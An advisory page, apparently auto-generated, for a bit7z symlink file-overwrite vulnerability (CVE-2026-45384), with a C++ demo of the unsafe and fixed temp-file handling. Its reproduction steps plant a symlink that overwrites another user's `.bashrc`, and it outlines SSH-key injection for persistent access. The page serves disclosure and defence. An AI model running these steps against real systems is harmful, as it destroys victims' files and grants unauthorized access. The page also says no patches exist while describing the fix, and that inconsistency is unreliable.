VYPR
Medium severity (score 6.1) · NVD Advisory · Published Jun 10, 2026

CVE-2026-45384

Description

bit7z library versions prior to 4.0.12 allow arbitrary file overwrite via symlink attack on predictable temporary files during archive updates.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Prior to version 4.0.12, the bit7z C++ static library contains an arbitrary file overwrite vulnerability. When updating an existing archive in-place using BitOutputArchive::compressToFile(), the library writes compressed data to a predictable temporary file named <archive_path>.tmp. This temporary file is opened using std::ofstream::open() with std::ios::trunc, which unconditionally follows symbolic links without any symlink check or O_NOFOLLOW protection. This affects Linux, macOS, and BSD platforms where symlinks are supported and the archive directory is writable by multiple users [1].

Exploitation

An attacker with write access to the directory containing the archive can exploit this vulnerability. The attacker first places a symbolic link at `<archive_path>.tmp` that points to an arbitrary target file. When a legitimate process subsequently updates the archive, the bit7z library follows the symlink and overwrites the target file with the archive data. This is not a race condition: the symlink is placed before the update operation begins and persists throughout [1]. On Windows, creating symbolic links typically requires administrator privileges or Developer Mode, which limits exploitability on that platform [2].

Impact

Successful exploitation allows an attacker to overwrite arbitrary files on the system with the archive data. If the archive format is TAR (uncompressed), an attacker can embed an SSH public key into the archive. This key can be injected into the ~/.ssh/authorized_keys file, granting the attacker persistent unauthorized SSH access with the privileges of the user running the bit7z process [1].

Mitigation

This vulnerability has been fixed in bit7z version 4.0.12, released on or before June 10, 2026. Updating to version 4.0.12 or later is strongly recommended [2].

AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

  • Rikyoz/Bit7z (2 versions, no CPE), affected range: <4.0.12

Patches

No patches discovered yet.

Vulnerability mechanics

Root cause

"The library unconditionally follows symlinks when opening predictable temporary files for archive updates, allowing arbitrary file overwrites."

Attack vector

An attacker with write access to the archive directory can pre-place a symlink at the predictable temporary file path (`<archive_path>.tmp`). When a process subsequently updates the archive using `BitArchiveEditor::applyChanges()`, the library follows this symlink and overwrites the target file with archive data. This can lead to arbitrary file overwrite, and in the case of TAR archives, persistent unauthorized SSH access by injecting an SSH public key into `~/.ssh/authorized_keys` [1].

Affected code

The vulnerability lies in `BitOutputArchive::compressToFile()` within `src/bitoutputarchive.cpp`, which constructs a predictable temporary file path by appending `.tmp` to the archive name when updating. The `CFileOutStream` constructor in `src/internal/cfileoutstream.cpp` then opens this path using `std::ofstream::open()` with `std::ios::trunc`, which follows symlinks without any checks [1].

What the fix does

The patch addresses the vulnerability by ensuring that temporary files are created securely. Instead of directly opening a predictable `.tmp` file, the library should use a mechanism like `mkstemp()` to atomically create a unique temporary file with appropriate permissions. This prevents an attacker from predicting the temporary file's name and placing a symlink to it before it is opened for writing [1].
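As an added illustration (not bit7z code and not the project's patch), the C++ below shows the fixed-name `std::ofstream` open with `std::ios::trunc` beside a `mkstemp()`-based replacement, and a sandboxed demo under a private `mkdtemp()` directory that plants a symlink at the predictable `.tmp` name and checks which variant clobbers the link target. All function and file names are assumptions made for the example.

```cpp
// Added example, not bit7z's own code: predictable "<archive>.tmp" open (vulnerable)
// beside a mkstemp() replacement, with a sandboxed symlink demo (constructed files).
#include <cstdlib>
#include <fstream>
#include <sstream>
#include <string>
#include <unistd.h>

// Vulnerable pattern: fixed name, std::ofstream with std::ios::trunc follows an
// existing symlink and truncates/overwrites whatever it points to.
static bool writeTmpUnsafe(const std::string& archive, const std::string& data) {
    std::ofstream out(archive + ".tmp", std::ios::binary | std::ios::trunc);
    return static_cast<bool>(out << data);
}

// Hardened pattern: mkstemp() creates a brand-new file (O_CREAT|O_EXCL, mode 0600)
// under an unpredictable name next to the archive, so a pre-planted symlink is never
// opened; the caller would later rename() it over the archive. Returns "" on failure.
static std::string writeTmpSafe(const std::string& archive, const std::string& data) {
    std::string path = archive + ".XXXXXX";   // mkstemp() rewrites the X's in place
    int fd = mkstemp(&path[0]);
    if (fd < 0) return "";
    bool ok = write(fd, data.data(), data.size()) == static_cast<ssize_t>(data.size());
    close(fd);
    return ok ? path : "";
}

static std::string readFile(const std::string& p) {
    std::ifstream in(p, std::ios::binary);
    std::stringstream ss; ss << in.rdbuf(); return ss.str();
}

// Sandboxed demo: returns 1 when the unsafe writer overwrote the symlink target while
// the safe writer left it intact and used a different temp name; 0 otherwise.
static int demoSymlinkOverwrite() {
    std::string dir = "/tmp/bit7z_poc_XXXXXX";           // private 0700 scratch dir
    if (!mkdtemp(&dir[0])) return 0;
    std::string target = dir + "/victim.txt", archive = dir + "/data.7z";
    std::ofstream(target) << "original";
    symlink(target.c_str(), (archive + ".tmp").c_str());   // attacker-planted link
    writeTmpUnsafe(archive, "archive bytes");
    bool clobbered = readFile(target) == "archive bytes";
    std::ofstream(target, std::ios::trunc) << "original";  // reset for the safe run
    std::string tmp = writeTmpSafe(archive, "archive bytes");
    bool safe = !tmp.empty() && tmp != archive + ".tmp" && readFile(target) == "original";
    unlink((archive + ".tmp").c_str()); unlink(tmp.c_str()); unlink(target.c_str()); rmdir(dir.c_str());
    return (clobbered && safe) ? 1 : 0;
}
```

The demo directory is not sticky and the link and target share an owner, so `fs.protected_symlinks` does not intervene; in a sticky shared directory such as `/tmp` that sysctl would block the unsafe open.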

Preconditions

  • input: Attacker must have write access to the directory containing the archive.
  • config: The process performing the archive update must have write permissions to the target file.
  • config: On Linux, the attack is blocked in sticky-bit directories if `fs.protected_symlinks=1`; it succeeds in non-sticky shared directories or on older kernels.

Reproduction

# Step 1: myuser creates a shared directory and initial archive
mkdir -p /tmp/shared_backup && chmod 777 /tmp/shared_backup
echo "backup data" > /tmp/data.txt
./helper create /tmp/shared_backup/data.7z /tmp/data.txt

# Step 2: testpoc_user (attacker) plants symlink at predictable .tmp path
sudo -u testpoc_user ln -sf /home/myuser/.bashrc /tmp/shared_backup/data.7z.tmp

# Step 3: myuser's service updates the archive
echo "new entry" > /tmp/extra.txt
./helper update /tmp/shared_backup/data.7z /tmp/extra.txt

# Step 4: Observe the damage
od -A x -t x1z -N 16 /home/myuser/.bashrc
# 000000 37 7a bc af 27 1c 00 04 ... >7z..'...<

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
